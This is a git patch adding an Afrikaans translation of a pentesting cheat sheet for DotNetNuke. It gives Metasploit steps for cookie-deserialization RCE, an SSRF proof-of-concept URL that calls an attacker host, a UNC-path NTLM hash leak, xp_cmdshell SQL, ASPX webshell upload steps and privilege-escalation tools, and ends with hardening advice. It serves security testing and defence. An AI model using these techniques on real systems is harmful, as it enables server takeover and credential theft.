From 56d8e2f5185ea1873f819187ac7152fd7db61f12 Mon Sep 17 00:00:00 2001 From: Translator Date: Sat, 19 Jul 2025 08:09:24 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-web/dotnetnuke-d --- .../pentesting-web/dotnetnuke-dnn.md | 97 +++++++++++++++---- 1 file changed, 76 insertions(+), 21 deletions(-) diff --git a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md index 653980887..6472b9dec 100644 --- a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md +++ b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md @@ -4,37 +4,92 @@ ## DotNetNuke (DNN) -As jy as **administrateur** in DNN inlog, is dit maklik om RCE te verkry. +As jy as **administrateur** in DNN inlog, is dit maklik om **RCE** te verkry, maar 'n aantal *onaangetekende* en *post-auth* tegnieke is in die afgelope paar jaar gepubliseer. Die volgende spiekkaart versamel die nuttigste primitiewe vir beide offensiewe en defensiewe werk. -## RCE +--- +## Weergawe & Omgewing Enumerasie -### Via SQL +* Kontroleer die *X-DNN* HTTP antwoordkop – dit openbaar gewoonlik die presiese platformweergawe. +* Die installasiewizard lek die weergawe in `/Install/Install.aspx?mode=install` (toeganklik op baie ou installasies). +* `/API/PersonaBar/GetStatus` (9.x) gee 'n JSON blob wat `"dnnVersion"` bevat vir lae-privilege gebruikers. +* Tipiese koekies wat jy op 'n lewende instansie sal sien: +* `.DOTNETNUKE` – ASP.NET vorms verifikasieticket. +* `DNNPersonalization` – bevat XML/serialiseerde gebruikersprofieldata (ou weergawe – sien RCE hieronder). -'n SQL-konsol is beskikbaar onder die **`Settings`** bladsy waar jy **`xp_cmdshell`** kan aktiveer en **bedryfstelselskommando's** kan uitvoer. +--- +## Onaangetekende Exploitatie -Gebruik hierdie lyne om **`xp_cmdshell`** te aktiveer: -```sql -EXEC sp_configure 'show advanced options', '1' -RECONFIGURE -EXEC sp_configure 'xp_cmdshell', '1' -RECONFIGURE +### 1. Koekie Deserialisering RCE (CVE-2017-9822 & opvolgings) +*Geaffekteerde weergawes ≤ 9.3.0-RC* + +`DNNPersonalization` word op elke versoek gedeserialiseer wanneer die ingeboude 404 hanteraar geaktiveer is. Gemaakte XML kan dus lei tot arbitrêre gadgetkettings en kode-uitvoering. ``` -En druk **"Run Script"** om daardie sQL sinne te loop. - -Gebruik dan iets soos die volgende om OS-opdragte te loop: -```sql -xp_cmdshell 'whoami' +msf> use exploit/windows/http/dnn_cookie_deserialization_rce +msf> set RHOSTS +msf> set LHOST +msf> run ``` -### Via ASP webshell +Die module kies outomaties die regte pad vir gepatchte maar steeds kwesbare weergawes (CVE-2018-15811/15812/18325/18326). Exploitatie werk **sonder verifikasie** op 7.x–9.1.x en met 'n *geverifieerde* lae-regte rekening op 9.2.x+. -In `Settings -> Security -> More -> More Security Settings` kan jy **nuwe toegelate uitbreidings** byvoeg onder `Allowable File Extensions`, en dan op die `Save` knoppie klik. +### 2. Server-Side Request Forgery (CVE-2025-32372) +*Geaffekteerde weergawes < 9.13.8 – Patch vrygestel April 2025* -Voeg **`asp`** of **`aspx`** by en laai dan in **`/admin/file-management`** 'n **asp webshell** op genaamd `shell.asp` byvoorbeeld. +'n Bypass van die ouer `DnnImageHandler` regstelling stel 'n aanvaller in staat om die bediener te dwing om **arbitraire GET versoeke** uit te reik (semi-blind SSRF). Praktiese impakte: -Gaan dan na **`/Portals/0/shell.asp`** om toegang tot jou webshell te verkry. +* Interne poortskandering / metadata diensontdekking in wolkontplooiings. +* Bereik gasheer wat andersins deur die Internet geblokkeer is. -### Privilege Escalation +Bewys-van-konsep (vervang `TARGET` & `ATTACKER`): +``` +https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc +``` +Die versoek word in die agtergrond geaktiveer; monitor jou luisteraar vir terugroepe. -Jy kan **privileges verhoog** met behulp van die **Potatoes** of **PrintSpoofer** byvoorbeeld. +### 3. NTLM Hash Blootstelling via UNC Oorleiding (CVE-2025-52488) +*Geaffekteerde weergawes 6.0.0 – 9.x (< 10.0.1)* +Spesiaal saamgestelde inhoud kan DNN laat probeer om 'n hulpbron te verkry met 'n **UNC pad** soos `\\attacker\share\img.png`. Windows sal gelukkig NTLM-onderhandeling uitvoer, wat die bediener-rekening hashes aan die aanvaller blootstel. Opgradeer na **10.0.1** of deaktiveer uitgaande SMB by die firewall. + +### 4. IP Filter Omseiling (CVE-2025-52487) +As administrateurs op *Host/IP Filters* staatmaak vir admin portaal beskerming, wees bewus dat weergawes voor **10.0.1** omseil kan word deur `X-Forwarded-For` in 'n omgekeerde proxy-scenario te manipuleer. + +--- +## Post-Authentisering na RCE + +### Via SQL konsole +Onder **`Settings → SQL`** 'n ingeboude vrae venster laat uitvoering teen die webwerf databasis toe. Op Microsoft SQL Server kan jy **`xp_cmdshell`** aktiveer en opdragte genereer: +```sql +EXEC sp_configure 'show advanced options', 1; +RECONFIGURE; +EXEC sp_configure 'xp_cmdshell', 1; +RECONFIGURE; +GO +xp_cmdshell 'whoami'; +``` +### Via ASPX webshell oplaai +1. Gaan na **`Settings → Security → More → More Security Settings`**. +2. Voeg `aspx` (of `asp`) by **Allowable File Extensions** en **Save**. +3. Blaai na **`/admin/file-management`** en laai `shell.aspx` op. +4. Trigger dit by **`/Portals/0/shell.aspx`**. + +--- +## Privilege Escalation op Windows +Sodra kode-uitvoering bereik is as **IIS AppPool\**, geld algemene Windows privilege-escalation tegnieke. As die boks kwesbaar is, kan jy benut: + +* **PrintSpoofer** / **SpoolFool** om *SeImpersonatePrivilege* te misbruik. +* **Juicy/Sharp Potatoes** om *Service Accounts* te ontsnap. + +--- +## Versterking Aanbevelings (Blou Span) + +* **Opgradeer** na ten minste **9.13.9** (herstel SSRF omseiling) of verkieslik **10.0.1** (IP-filter & NTLM probleme). +* Verwyder oorblywende **`InstallWizard.aspx*`** lêers na installasie. +* Deaktiveer uitgaande SMB (poorte 445/139) egress. +* Handhaaf sterk *Host Filters* op die rand proxy eerder as binne DNN. +* Blokkeer toegang tot `/API/RemoteContentProxy` as dit nie gebruik word. + +## Verwysings + +* Metasploit `dnn_cookie_deserialization_rce` module dokumentasie – praktiese ongemagtigde RCE besonderhede (GitHub). +* GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF omseiling & patch inligting. {{#include ../../banners/hacktricks-training.md}}